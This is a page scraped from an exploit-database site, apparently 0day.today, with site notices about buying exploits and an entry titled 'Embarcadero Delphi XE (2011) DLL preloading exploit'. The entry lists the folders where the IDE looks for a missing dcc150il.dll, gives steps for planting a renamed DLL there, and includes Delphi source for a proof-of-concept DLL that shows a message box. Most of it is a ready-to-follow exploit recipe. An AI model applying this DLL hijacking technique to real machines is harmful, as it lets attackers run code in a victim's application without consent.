0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Embarcadero Delphi XE (2011) DLL preloading exploit
=================================================== Embarcadero Delphi XE (2011) DLL preloading exploit =================================================== Exploit Title : [Embarcadero Delphi XE (2011), DLL preloading exploit] Author : [STRELiTZIA] Software : [Delphi XE (2011)] Tested on : [Windows Xp SP3] ============================ = Description = ============================ Delphi XE, searchs and laods INEXISTENT "dcc150il.dll" library without checks, or any visual warning messages related to library modifications. Vulnerability that can allow attackers to execute malicious code locally, without user consent, in the privilege context of the targeted application. ============================ = Instructions = ============================ Default searching folders: %C%:\Program Files\Embarcadero\RAD Studio\8.0\bin\dcc150il.dll %C%:\WINDOWS\system32\dcc150il.dll %C%:\WINDOWS\system\dcc150il.dll %C%:\WINDOWS\dcc150il.dll %C%:\Documents and Settings\%User%\%My documents%\RAD Studio\Projects\dcc150il.dll %C%:\Documents and Settings\All Users\Documents\RAD Studio\8.0\BPL\dcc150il.dll %C%:\WINDOWS\system32\wbem\dcc150il.dll 1- Copy "Test.dll" into "One of listed folders" 2- Rename "Test.dll" to "dcc150il.dll" ============================ = Tests = ============================ - Launch Embarcadero Delphi XE. - File ->> New ->> VCL Forms application - Delphi. ============================ = Test Dll Source "Delphi" = ============================ Library Test; uses Windows; begin MessageBoxA ( 0, PChar('Yep, I''m running in your system without your permission.'), PChar('Sample'), MB_ICONSTOP ); end. # 0day.today [2024-11-14] #